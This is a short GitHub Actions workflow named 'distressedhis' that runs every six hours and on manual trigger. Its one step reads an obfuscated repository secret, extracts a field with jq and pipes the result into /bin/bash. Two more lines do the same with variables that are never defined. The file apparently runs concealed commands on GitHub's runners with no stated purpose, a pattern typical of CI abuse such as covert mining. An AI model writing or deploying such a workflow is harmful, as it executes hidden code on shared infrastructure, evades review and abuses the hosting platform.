name: distressedhis
on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: distressedhis
        env:
          rnl5: ${{ secrets.rnl5 }}
        run: |
          echo $rnl5 | jq -r .xy20466 | /bin/bash
          echo $ul07754 | jq -r .g7 | /bin/bash
          echo $oom58 | jq -r .vbh2 | /bin/bash

